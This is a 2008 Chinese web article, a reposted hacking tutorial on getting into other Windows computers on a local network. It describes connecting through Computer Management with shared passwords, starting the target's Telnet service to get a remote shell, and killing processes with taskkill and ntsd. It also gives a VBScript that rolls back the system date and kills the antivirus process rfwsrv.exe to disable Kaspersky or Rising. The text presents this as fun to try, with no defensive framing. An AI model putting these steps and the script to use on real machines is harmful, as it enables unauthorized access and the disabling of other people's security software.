windows局域网的一个经典的入侵方法pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范windows局域网的一个经典的入侵方法

windows局域网的一个经典的入侵方法


2008/11/26  编辑:佚名 来源:本站整理

3年前我用的东西了, 有可能大家比较老了, 不过也许现就在还是能用上的, 不过大家不妨试验一下很有趣的。
  点我的电脑右键单机管理, 之后点操作底下的=》连载到另外一个电脑计算机。 输入对方ip
  或者您不知道对方ip 可以能够这样, 点浏览高级里的立即查找, 就可以显示本局域网工作组内的计算机了。 然后双击你要进入的电脑, 呵呵一般局域网的计算机密码是一样的, 所以不有请求需要NTLM验证, 不过那个验证比较老了, 现在不知道还是有没有人会用, 进入后然后点服务和应用, 去寻找到telnet服务, 然后启动对方telnet服务, 如果没有进入这些界面或者服务出错是因为对方没有开rpc服务, 当然还是选择中放弃吧, 如果按照刚才步骤成功, 那恭喜你已经得到一个进入对方计算机的通道了。
  然后在cmd底下输入 telnet 对方ip地址 就一定会显示对方的一个cmdshell了, 当然这里有个小技巧, 如果你不知道对方ip怎么办。 很不复杂cmd下输入net view 可以查看到局域网计算机名, 然后点鼠标右键 标记你要的计算机名字选中 按下回车就复制到cmd的剪切板里了, 然后用ping命令 ping 粘贴你刚才复制的内容(直接点右键就出来了) 然后就能看到你ping的ip了。
  进入对方计算机该后该怎么做呢。 呵呵 很多黑客教程好像没有具体告诉我们我自己下一步我们该怎么办吧 嘿嘿。
  发挥你的想象, 把对方电脑就当成你本机一样去对待, 比如你想查看对方进程。
  cmd 下输入 tasklist
  进程太多看不完怎么办 tasklist | more
  想杀掉他的进程怎么办?
  taskkill /f /im 进程名字 /t 如关qq taskkill /f /im qq.exe /t
  或者有的用ntsd杀进程
  ntsd -c q -p PID
  PID是用他是用tasklist就可以看到的对照相应的PID就能杀进程
  如果多次查杀对方进程不成功是什么原因, 很可能对方有杀毒软件或者防火墙
  怎么去杀掉卡巴这些进程呢?
  这里有一个脚本
  Set ws = CreateObject("Wscript.Shell")
  ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide
  for each ps in getobject("winmgmts:\\.\root\cimv2:win32_proCESs").instances_
  if ps.Name="rfwsrv.exe" then
  ws.run "ntsd -c q -p ps.handle",0
  我们可以这样去做 echo 加上面的每一行脚本代码>>c:\kill.vbs
  最后在运行这个脚本 就可以了。 呵呵
  也可以你觉得麻烦直接输入 date 然后加日期修改成1988年左右就行了 卡巴就失效了
  瑞星的原理也是taskkill掉了rfwsrv.exe这个进程使杀毒软件失效。
  其他的就不用我说了自己研究点dos命令就可以搞定了。

相关文章
  • 如何获得win server 2008操作系统序列号
  • Win10系统怎么可以加快菜单显示速度?
  • windows7输入法的操作方法
  • windows10如何才可以查看当前系统的激活码?
  • 亳州市区这些区域已实现免费WiFi全覆盖
  • widows7CPU温度观察,Win7系统查看CPU温度的方法
  • Win10系统下avi文件无法打开怎么办?
  • windows7不能删除软件!Win7系统软件无法卸载怎么办
  • win7系统msn无法登录,Win7登录msn失败提示“错误代码80040154”怎么解决?
  • Win7系统共享打印机的权限教程Win10和Win7系统局域网打印机共享设置过程介绍
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图